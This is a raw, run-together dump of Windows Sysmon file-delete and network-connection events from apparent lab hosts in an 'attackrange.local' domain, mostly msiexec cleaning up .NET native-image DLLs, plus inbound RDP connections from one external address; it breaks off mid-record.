23542300x800000000000000072955Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:26.531{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=714795124C6B5E89DC35A2138382B9E1,SHA256=6E28D32995125EADD57C3A4C17477849AEDA4A7D94911219929C210C069148D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072954Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:26.344{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\J36I8I01GY\System.ServiceProcess.ni.dll.auxMD5=7F30D62C40ECEBE959AB7FB13D9CACB6,SHA256=F563890C1B347670F0A4C7D48375B329C4D6D5668656AB34D431CF54BDC84959,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072953Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:26.344{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\J36I8I01GY\System.ServiceProcess.ni.dllMD5=6DA4DEFCCDD3303D217F37080B3C82F2,SHA256=5848262A5DF18EEDA336B5BCB85B1E4544E04A99B0D79AD3E249CB0F4AF89CCF,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072952Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:26.328{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\J28YD181DN\System.Web.Extensions.ni.dll.auxMD5=C347F922A9553D718BBCAEEE3869876C,SHA256=722410E5968780B9E761CF0DD4EB88AE0ECFDFDD4108B53D86E537B6EA9C8737,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072951Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:26.328{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\J28YD181DN\System.Web.Extensions.ni.dllMD5=77ED9EDEB0747952D3B1A7B6E67D01E3,SHA256=9307F45BFEF69DEF67D5F1B21A7EE2B9DC6B8721A33329220F5038C01A3B0A8C,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072950Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:26.266{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\IWZPZAJL13\System.Management.ni.dll.auxMD5=01E8C031085FF8BBB38DD53F01924384,SHA256=3C5FAA30091A95257E80AC41FD202AFCB16ECDF79580A88B7BFC05ECF44F2FE7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072949Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:26.266{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\IWZPZAJL13\System.Management.ni.dllMD5=5C1FAAE417082B6C49E892CB5E511218,SHA256=68EBA231E243F2FBDE1EC5F1EE17FA7C1D6B49EB116652AAE4E980CCF1878101,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072948Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:26.234{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\IVTSH2AZKH\System.DirectoryServices.ni.dll.auxMD5=E240420E93103B565F0E202D65BF02CC,SHA256=30A7A2ECEEA4B1E1EDE71D67D6B3E652C6996BD71D330FE6C58618AE230795F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072947Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:26.234{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\IVTSH2AZKH\System.DirectoryServices.ni.dllMD5=1C9EB8C8F79E7AE6D1837A92AEA937C9,SHA256=3FDBD432E9BD0A40D636E64FED0E27AFA7AFE8EC8DFBAF1CEB0E02CF9D45E191,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072946Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:26.219{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\ISOLJHW95H\System.Security.ni.dll.auxMD5=A8E16B0835C7BA8888173106EDFD7698,SHA256=7D44F7630D8C42C9BCBA5DB5C74B36391E11FC17D4FAF6D26C452C1BD3E359EE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072945Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:26.219{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\ISOLJHW95H\System.Security.ni.dllMD5=B92BEE33B09857E5DB60DF34BED170CA,SHA256=C07B57EDCAACD9E9B6CA2340A8DAB75CCF3BE99EDDF063804E73FFB74CDE645D,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072944Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:26.203{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\ILWKXVRXJC\Microsoft.CSharp.ni.dll.auxMD5=DD0CEB4EA439E19B10174EF6765C98E1,SHA256=75AE3D143A5C54005FD62BDD0961B822893FA6950D9511F46D3F0FBA167B910E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072943Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:26.203{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\ILWKXVRXJC\Microsoft.CSharp.ni.dllMD5=B532D8EE87DC58C1B47163040764B56F,SHA256=D21ED6A4DE422B51B01FB33ABE0B8A7E05ECB33DE3565C080BC7F36531BA0ED3,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072942Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:26.172{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\IKXY32A1W2\System.Configuration.Install.ni.dll.auxMD5=08DAC8470A6071A6F9D300CCECE11FDC,SHA256=F21F4F9BD5BEBE704971BBC058A01C007211FABC2BF86E2BDFF504394E89A5F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072941Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:26.172{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\IKXY32A1W2\System.Configuration.Install.ni.dllMD5=6CEF29BBBE3A64E8EDA58C8614B58316,SHA256=D6B4C973DAA83DB08F6D1013643F3A287BE92A3DF7629A06421EA2370B126C58,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072940Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:26.172{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\IK5PEOTIH1\System.Numerics.ni.dll.auxMD5=6D550B69BDC7D89EC2E3554A3DDB4667,SHA256=7CF8E63A66C6685A48A43466D8842DE966699265AF5DDA14CF5EE7EA2398B019,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072939Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:26.172{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\IK5PEOTIH1\System.Numerics.ni.dllMD5=AF5901179DD8427F1BCE805FC1C60542,SHA256=976A8BC3D65758BF022E26BC0F8BEC1B908D58665A99B6DB45FD5004809E16C5,IMPHASH=00000000000000000000000000000000truetrue 354300x800000000000000072938Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:24.115{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-27406-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000072937Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:24.115{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-30135-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000072936Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:26.156{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\IHRTXUCXB7\System.Core.ni.dll.auxMD5=34557D491F925C33B9579E2AE5BD4017,SHA256=AD30F4DA8CFDDF64D38E65145696AF7233CD5ABA10C244B882ABAFB770D7E608,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072935Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:26.156{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\IHRTXUCXB7\System.Core.ni.dllMD5=19160F5E64B830DD9B54C49057A68163,SHA256=F18AEDE0C9B8E6ADA6BF9FCBD86239712F1C420E1BAEF0FF02339F2F15F8BB81,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072934Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:26.047{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\IGNWWS1ZB4\System.Windows.Forms.ni.dll.auxMD5=D446BDCD7E3BFA151BD38417CA52BBB4,SHA256=DC1794960B5836EC691C2DC58B068E76C8FE07B8A1293373ED30ED08A02887B4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072933Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:26.031{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\IGNWWS1ZB4\System.Windows.Forms.ni.dllMD5=EBA141EB6870A5CE8F381C7423130E8C,SHA256=60BF35B16E89046C8D5D49C3FE8D73AF63226FA1A4C865B96EE067035A3C21A8,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000050017Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:26.890{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=389C459D96EE7310B5A8D2C7710E50AE,SHA256=2028AA01E017105F6548259CAC59C03D0A6768DB9C59997CF7EC464F1D752FB0,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050016Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:24.373{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-50957-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000050015Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:24.176{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-64366-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050014Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:26.140{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8A946DD7846B5185651232BDE58619D7,SHA256=1563B6A5DC7333E9AEE40EE172A63F87A3EF770D12AB9A3B9EAC53284D1D4C68,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072988Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:27.953{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\KXNDZRV6MH\System.DirectoryServices.ni.dll.auxMD5=C2E0864BC116ECCED285DA8D65EBA6C4,SHA256=2BB21F1B779326CC28A17D48D9F22E3D40D2AA67CF35282497E9BB087377688B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072987Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:27.953{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\KXNDZRV6MH\System.DirectoryServices.ni.dllMD5=D8D409480F7CC454D0719266B2D7D9CC,SHA256=9B5D64CF20C48A42257A1E2E68F810F179E553C3CF743ADCA720BC20682A0849,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072986Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:27.937{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\KWU26L5G78\System.Numerics.ni.dll.auxMD5=CC8504EB0D831F3A4D7BF486C8BBEA57,SHA256=E9740B680C31812CB7524E87205E12CA8DA04DE69735BD7EAA900EDEA24D8309,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072985Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:27.937{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\KWU26L5G78\System.Numerics.ni.dllMD5=AD4643D2B1E5DF5D5B5986C4870424FB,SHA256=E7518CA9B10991F2C502321C26DD4F3AB778E162B1A3AC90888628FC864C47BB,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072984Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:27.937{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\KU41JGUGM9\System.Xml.ni.dll.auxMD5=63CFFCE43BBED168D0654C5A8A018374,SHA256=3424CFD864C6AE00FFC20B978CC30ABBA607511DCD8E423091E952A7A99B11F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072983Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:27.922{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\KU41JGUGM9\System.Xml.ni.dllMD5=4BC31F57ACB281F7C863B91725EB6C29,SHA256=459055F2D2B7F600BE627AA49F1681130C1892BC0A0F8DDC76E9BCA32487DE2D,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072982Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:27.703{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\KOLTA8KVP1\System.Transactions.ni.dll.auxMD5=684302FE423D7E41FDC82C1D5856E236,SHA256=F337F5920192EC0AACF5FB4361AC90BC3C648AC0846D5C2CE84645D465DE0ECB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072981Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:27.703{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\KOLTA8KVP1\System.Transactions.ni.dllMD5=ED09B66BD9413256CD1DED2FD1782AD2,SHA256=90BD081F86F3888C1C8F639B10BD88D7F212573EBCC4E7B226103CC1472AD823,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072980Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:27.656{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\KKNIV7Y3I1\System.ni.dll.auxMD5=4D1A6689DC11F81CF9642E9CA661FBD8,SHA256=184270D73884EA9ADD722EAEC9D3A0806F5CBD2C7CB4D6DC4591869DDB2A4194,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072979Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:27.656{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\KKNIV7Y3I1\System.ni.dllMD5=1D502B42F3922DB469D11EC1DD4A452F,SHA256=3F4717011759940D5F9F588CC8BED4B958CD94C373592206C1AAEBE284DAD7EA,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072978Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:27.562{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E639D36111978362AD7A3B436BD4EC2,SHA256=468888B6F2A07631213E2ABA3F41AA73BBC8B71456A2AB26A27071859D013D21,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072977Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:27.547{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3AFA8035336FDFD103BE8C0B8C26B136,SHA256=0282703FBF3BBA58A45BD024480232B42C6BC980E1D49DE28994D899CF240F9E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072976Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:27.547{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BBF8F5E5DB902D010AB6F492334CDEFD,SHA256=F402A221D44B150794F5BDFA5DDEC9E9511862F33F9ACB93F60FF1B8D96E32D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072975Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:27.375{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\KIR6X57GGI\System.ServiceProcess.ni.dll.auxMD5=A2054B56E52D30E988FB8E8A16E667BF,SHA256=009ABF98AFF25034C2A60E2E5C2F5687889F13B9435D965E52052A797E830C74,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072974Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:27.375{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\KIR6X57GGI\System.ServiceProcess.ni.dllMD5=701013E651E17E9D7EFC716A52EF250D,SHA256=653178D1F2FE4983C9E8FAC3E4BC2F0CE7CAB8F5A44BF1FB710B901082841FEE,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072973Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:27.359{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\KERR5LIL6C\Microsoft.CSharp.ni.dll.auxMD5=74793ED55CA5E05229CDD02BCE056C64,SHA256=109B547081FB3D7DD775E60449A24B88EAF5A35B5EC3B69F4B0987E6EA0D5C84,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072972Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:27.359{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\KERR5LIL6C\Microsoft.CSharp.ni.dllMD5=401729E38D7ABECD78EC2E9BCA281C5C,SHA256=BF273BA827A9BADBB785086965D428382DDFDE50B53355D2BCD4AFF70695C0BE,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072971Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:27.328{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\K2C08Z5VQM\System.ni.dll.auxMD5=938F2463A77401FE0B14F375FA9E1ECC,SHA256=CF737F659C2B4F6A5991AECCCB5A424748075189BDD3853576AC68B316A37A36,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072970Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:27.328{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\K2C08Z5VQM\System.ni.dllMD5=E5B921ECDA5B62F89AD0F30770489EE7,SHA256=94548B6DA782327576F76F826309ACB5CF6A80F9799F6C1D79DF4320DD8A36EB,IMPHASH=00000000000000000000000000000000truetrue 354300x800000000000000072969Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:25.571{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-31501-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000072968Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:27.172{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\JZRSZT2CW2\System.Management.ni.dll.auxMD5=6A1ED5F375F35E5000F06E42632B9E14,SHA256=A3D9E8A96C68109971E52D75B1C57257B2395ACD44D7456BAD975E0C47FB6808,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072967Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:27.172{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\JZRSZT2CW2\System.Management.ni.dllMD5=76B681C13EE83FC02CC7D726525F5E29,SHA256=A92B801DED31B63487D5D5A30C3009376F6BC3E7432A6CD14CE46A26DAD2371A,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072966Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:27.156{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\JXCZJIJOPH\System.Numerics.ni.dll.auxMD5=8C8F36DCBC0AB4F29DC79D33D9CD7240,SHA256=48D6097F83178C3905EC2BCDA01C80CFFB1A832CB1F0BF5F08E510C86D6F9215,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072965Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:27.156{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\JXCZJIJOPH\System.Numerics.ni.dllMD5=845E361BD51C969466956F80361DE179,SHA256=1BFFC23BB5882DA343969E12ABE4FC89BBC0EC41D9C30E7DDBCA7ACF250A2752,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072964Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:27.141{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\JUQ7610ZGN\System.Windows.Forms.ni.dll.auxMD5=337A44DF08CED104D7814C2A7B3A0898,SHA256=C5E3AE32A409B4FCCE84FA81A83509558C8AC31166CF91760407F9DEEF2EAA60,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072963Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:27.141{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\JUQ7610ZGN\System.Windows.Forms.ni.dllMD5=AB95BE2F0381664F51CEDC66091D7BE9,SHA256=177E9A8A1D1800F1C28BEC108CD5AD847338548FDDB471FF708CE4FCC6F5C606,IMPHASH=00000000000000000000000000000000truetrue 354300x800000000000000050019Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:25.930{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-52435-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050018Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:27.172{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8BA0570314707FE9C5F29C7E0AEAC3C6,SHA256=E652A844CD4A2920EA64FC426D0545820A5A5741B8181FB12A773ACA719C8B1F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073006Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:28.641{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=93791895477D24B6C7DD57755CF55A46,SHA256=BD169C36F177CBA00C4A88102BB205F902DE52E29597D28483CD4482122D691C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073005Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:28.594{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\LLC80O1ZV5\System.Security.ni.dll.auxMD5=7BE8E3D8CBA8DE7A117F27F0345AACDB,SHA256=9BEB3A0B9B7CC3C5843693FD59757D3AF78C48A48C7E949A2DCABC3181AB7625,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073004Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:28.594{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT 